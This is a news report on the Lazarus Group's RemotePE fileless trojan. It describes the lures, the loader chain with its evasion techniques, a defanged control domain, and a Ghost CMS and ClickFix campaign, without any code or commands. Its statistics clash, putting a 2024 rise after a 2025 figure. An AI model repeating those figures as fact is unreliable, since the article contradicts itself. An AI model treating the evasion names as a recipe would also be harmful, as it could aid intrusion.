The North Korea-linked Lazarus Group has deployed a sophisticated fileless remote access trojan (RAT) known as RemotePE to infiltrate banks and cryptocurrency companies. First discovered in September 2025, the malware operates entirely within a system’s memory, making it nearly impossible to detect through traditional forensic methods. The Lazarus Group has already stolen $577 million in cryptocurrency during the first four months of 2026, a sum that accounts for 76% of all global crypto thefts this year.
The cybercrime organization utilizes complex social engineering to gain an initial foothold. Operators pose as employees of trading firms on Telegram and use counterfeit versions of popular scheduling platforms like Calendly and Picktime. This “human in the loop” methodology allows the group to build rapport with targets before initiating a three-stage infection chain designed to minimize disk footprint and evade security software.
Analysts at Fox-IT, an affiliate of NCC Group, noted that RemotePE is designed for long-term reconnaissance. Unlike typical disruptive attacks, the trojan is built to sustain itself in a network silently, allowing the state-sponsored actors to gather intelligence before striking. This development highlights the escalating threat to institutional security as bitcoin exchange supply maintains multi-year lows and investors increasingly rely on high-liquidity digital platforms.
Stealth techniques and the RemotePE infection chain
The malware’s architecture employs a coordinated sequence to bypass Endpoint Detection and Response (EDR) solutions. It begins with DPAPILoader, a dynamic-link library (DLL) that has also appeared under the filename Iassvc.dll since November 2023. This loader uses the Windows Data Protection Application Programming Interface (DPAPI) to decrypt a payload stored on the disk, ensuring the malicious code remains hidden from simple scans.
The decrypted payload is handed to RemotePELoader, which creates an HTTP connection to a command-and-control server at aes-secure[.]net. To remain invisible, the loader uses “Hell’s Gate” techniques and ETW (Event Tracing for Windows) patching to disable security monitoring. The final RemotePE payload runs in-memory and never touches the filesystem, effectively avoiding tools that monitor for unauthorized file modifications.
The persistent nature of these attacks was recently documented at a decentralized finance (DeFi) firm. Investigators found the infrastructure was compromised by three different RATs: RemotePE, PondRAT, and ThemeForestRAT. These malicious tools were used to replace one another, ensuring the attackers maintained access even if one specific strain was identified and removed.
North Korean dominance in global cybercrime grows
Data from blockchain analytics firm TRM Labs shows a stark increase in North Korea’s share of global crypto crime. In 2025, the country was responsible for 64% of stolen funds, a figure that has climbed to 76% in 2024 despite just two major hacking incidents. This shift toward high-value, sophisticated operations has resulted in a total of $6 billion stolen by the group since 2017.
International authorities allege these funds are used to finance the country’s nuclear and weapons development programs in defiance of sanctions. The group’s ability to extract such significant value through a small number of attacks suggests a highly disciplined approach to choosing targets. As THORChain warns users about widespread fraud, the professionalization of groups like Lazarus remains the primary concern for industry cybersecurity experts.
The economic impact of these thefts is compounded by the volatility of the current market. As crypto liquidations rise alongside broader macro pressures, the loss of $577 million in just four months places immense strain on DeFi ecosystems and banking protocols that are already navigating a sensitive regulatory environment.
Exploiting web infrastructure via Ghost CMS flaws
The Lazarus Group’s activity extends beyond direct social engineering into broader infrastructure exploitation. Cybersecurity experts recently identified a campaign targeting over 700 sites running the Ghost Content Management System (CMS). By leveraging a critical SQL injection flaw, the attackers gained access to administrator accounts for AI companies, news agencies, and fintech firms.
Hackers used these admin accounts to inject malicious JavaScript into “ClickFix” distribution channels, which redirected users to fake CAPTCHA pages. Victims were prompted to enter a string of code into a Run dialog box, which initiated a batch script on their machine. This script eventually installed an open-source version of an Electron application called Grape, which maintains persistent contact with its controllers.
Once installed, the Grape malware polls the command-and-control domain every 30 seconds to receive instructions. This multi-layered strategy demonstrates that the Lazarus Group is moving toward a more diversified attack surface. By targeting web management systems, they can gain entry into corporate networks that may not be directly related to their primary financial targets, creating a wider net for future heists.
